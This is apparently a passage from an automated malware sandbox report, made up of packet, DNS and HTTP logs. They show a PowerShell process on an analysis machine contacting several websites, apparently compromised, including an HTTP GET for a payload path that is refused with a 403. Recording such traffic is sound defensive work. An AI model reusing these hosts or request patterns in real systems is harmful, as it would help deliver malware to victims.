                                                                                                                        Mar 16, 2021 14:27:14.859731913 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859755039 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859777927 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859806061 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859833002 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859858036 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859882116 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859921932 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.860100985 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.863636971 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.941807032 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:14.986427069 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.990467072 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:14.990628958 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:15.036123991 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.043883085 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.043914080 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.044121981 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:15.045878887 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:15.089792967 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.334788084 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.488329887 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.489423037 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.489614010 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.642575026 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649028063 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649059057 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649075031 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649091005 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649156094 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649173021 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649194002 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649211884 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649286985 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649306059 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.651932955 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.652003050 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.803983927 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804017067 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804033995 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804049969 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804068089 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804086924 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804130077 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804148912 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804164886 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804182053 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804214001 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804209948 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.804230928 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804265022 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.804272890 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.804291010 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.804315090 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804336071 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804352999 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804368973 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804387093 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.804413080 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.804440022 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804457903 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804476023 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804492950 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804512978 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.804536104 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.956338882 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956374884 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956393003 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956417084 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956434965 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956454039 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956468105 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956480980 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956500053 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956499100 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.956518888 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956577063 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.956581116 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956603050 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956609011 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.956680059 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956693888 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956707954 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956721067 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956748962 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956765890 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956840992 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956859112 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956917048 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956945896 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.956968069 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.957003117 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957020044 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.957027912 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957073927 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957093954 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957098007 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.957140923 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.957184076 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957211971 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957231045 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957248926 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957304955 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957313061 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.957329988 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957381964 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.957422018 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.957779884 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:16.047030926 CET49726443192.168.2.5139.180.215.83
                                                                                                                        Mar 16, 2021 14:27:18.528503895 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:18.528523922 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:18.528584003 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:19.065367937 CET49726443192.168.2.5139.180.215.83
                                                                                                                        Mar 16, 2021 14:27:25.065949917 CET49726443192.168.2.5139.180.215.83
                                                                                                                        Mar 16, 2021 14:27:37.503130913 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:37.503290892 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:37.504519939 CET4972080192.168.2.5185.104.45.33

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Mar 16, 2021 14:26:45.018130064 CET6206053192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:45.069802999 CET53620608.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:46.239038944 CET6180553192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:46.287806988 CET53618058.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:47.677719116 CET5479553192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:47.729105949 CET53547958.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:49.083822966 CET4955753192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:49.143712044 CET53495578.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:50.354598045 CET6173353192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:50.403479099 CET53617338.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:51.384907007 CET6544753192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:51.441956997 CET53654478.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:51.492477894 CET5244153192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:51.541562080 CET53524418.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:53.860394001 CET6217653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:53.952194929 CET53621768.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:54.514662981 CET5959653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:54.576627016 CET53595968.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:55.531621933 CET5959653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:55.606259108 CET53595968.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:56.522722960 CET5959653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:56.560923100 CET6529653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:56.584485054 CET53595968.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:56.612665892 CET53652968.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:57.611574888 CET6318353192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:57.660187960 CET53631838.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:58.538458109 CET5959653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:58.590634108 CET53595968.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:26:58.828769922 CET6015153192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:26:58.885979891 CET53601518.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:00.515932083 CET5696953192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:00.573824883 CET53569698.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:02.555042982 CET5959653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:02.607939005 CET53595968.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:04.154870987 CET5516153192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:04.216629982 CET53551618.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:10.490746975 CET5475753192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:10.583050013 CET53547578.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:10.839803934 CET4999253192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:10.897020102 CET53499928.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:10.922760010 CET6007553192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:11.290205956 CET53600758.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.798408985 CET5501653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:12.861239910 CET53550168.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.529453993 CET6434553192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:13.594244957 CET53643458.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.598083973 CET5712853192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:13.657845020 CET53571288.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.883002043 CET5479153192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:14.940201998 CET53547918.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.159894943 CET5046353192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:15.326390982 CET53504638.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.969976902 CET5039453192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:16.045629978 CET53503948.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:16.525780916 CET5853053192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:16.574441910 CET53585308.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:39.407004118 CET5381353192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:39.466701031 CET53538138.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:41.013396025 CET6373253192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:41.071105003 CET53637328.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:45.594057083 CET5734453192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:45.646720886 CET53573448.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:52.772317886 CET5445053192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:27:52.834152937 CET53544508.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:10.778630972 CET5926153192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:10.838938951 CET53592618.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:11.385499001 CET5715153192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:11.474045992 CET53571518.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:11.644752026 CET5941353192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:11.709861040 CET53594138.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:11.952578068 CET6051653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:12.009624958 CET53605168.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:12.876977921 CET5164953192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:12.925679922 CET53516498.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:13.875411034 CET6508653192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:13.935401917 CET53650868.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:14.533766031 CET5643253192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:14.593414068 CET53564328.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:15.393038988 CET5292953192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:15.451446056 CET53529298.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:16.209446907 CET6431753192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:16.258157969 CET53643178.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:17.252914906 CET6100453192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:17.304749966 CET53610048.8.8.8192.168.2.5
                                                                                                                        Mar 16, 2021 14:28:18.151496887 CET5689553192.168.2.58.8.8.8
                                                                                                                        Mar 16, 2021 14:28:18.200567961 CET53568958.8.8.8192.168.2.5

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Mar 16, 2021 14:27:10.490746975 CET192.168.2.58.8.8.80xc27eStandard query (0)cherkashchanu.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:10.839803934 CET192.168.2.58.8.8.80x3c86Standard query (0)servicios.semperti.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:10.922760010 CET192.168.2.58.8.8.80xc636Standard query (0)giatot365.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:12.798408985 CET192.168.2.58.8.8.80xd39eStandard query (0)calltorepair.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:13.529453993 CET192.168.2.58.8.8.80xa70dStandard query (0)www.calltorepair.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:13.598083973 CET192.168.2.58.8.8.80x751aStandard query (0)www.calltorepair.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:14.883002043 CET192.168.2.58.8.8.80xf2f6Standard query (0)tongdaihanoi.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:15.159894943 CET192.168.2.58.8.8.80xb582Standard query (0)opheliasbrewery.comA (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:15.969976902 CET192.168.2.58.8.8.80x997Standard query (0)xuanthinhshop.comA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Mar 16, 2021 14:27:10.583050013 CET8.8.8.8192.168.2.50xc27eNo error (0)cherkashchanu.com185.104.45.33A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:11.290205956 CET8.8.8.8192.168.2.50xc636No error (0)giatot365.com103.28.39.103A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:12.861239910 CET8.8.8.8192.168.2.50xd39eNo error (0)calltorepair.com107.180.2.185A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:13.594244957 CET8.8.8.8192.168.2.50xa70dNo error (0)www.calltorepair.comcalltorepair.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:13.594244957 CET8.8.8.8192.168.2.50xa70dNo error (0)calltorepair.com107.180.2.185A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:13.657845020 CET8.8.8.8192.168.2.50x751aNo error (0)www.calltorepair.comcalltorepair.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:13.657845020 CET8.8.8.8192.168.2.50x751aNo error (0)calltorepair.com107.180.2.185A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:14.940201998 CET8.8.8.8192.168.2.50xf2f6No error (0)tongdaihanoi.com151.106.5.169A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:15.326390982 CET8.8.8.8192.168.2.50xb582No error (0)opheliasbrewery.com35.209.212.48A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:15.326390982 CET8.8.8.8192.168.2.50xb582No error (0)opheliasbrewery.com35.208.137.128A (IP address)IN (0x0001)
                                                                                                                        Mar 16, 2021 14:27:16.045629978 CET8.8.8.8192.168.2.50x997No error (0)xuanthinhshop.com139.180.215.83A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • cherkashchanu.com
                                                                                                                        • tongdaihanoi.com
                                                                                                                        • opheliasbrewery.com

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.549720185.104.45.3380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Mar 16, 2021 14:27:10.660463095 CET798OUTGET /Z:/4ZE8/ HTTP/1.1
                                                                                                                        Host: cherkashchanu.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Mar 16, 2021 14:27:10.732536077 CET799INHTTP/1.1 403 Forbidden
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 16 Mar 2021 13:27:10 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 1893
                                                                                                                        Connection: keep-alive
                                                                                                                        ETag: "60509bbf-765"
                                                                                                                        x-ray: p529:0.000/wn19994:0.000/
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 20 2d 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 62 72 69 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 63 65 6c 6c 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 34 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 35 32 30 70 78 3b 22 3e 0a 20 20 20
                                                                                                                        Data Ascii: <!doctype html><html><head> <title>403 Forbidden - </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <style> body { background-color: #f1f4f5; color: #37474f; line-height: 1.4; font-family: 'Open Sans', sans-serif; margin: 0; padding: 0; } .error_code { display: block; font-size: 92px; font-weight: 700; margin-top: -25px; } .error_brief { display: block; font-size: 18px; font-weight: 700; margin-bottom: 15px; } </style></head><body><div style="display: table; position: absolute; height: 100%; width: 100%;"> <div style="display: table-cell; vertical-align: middle; padding: 0 40px;"> <div style="margin-left: auto; margin-right: auto; width: 520px;">
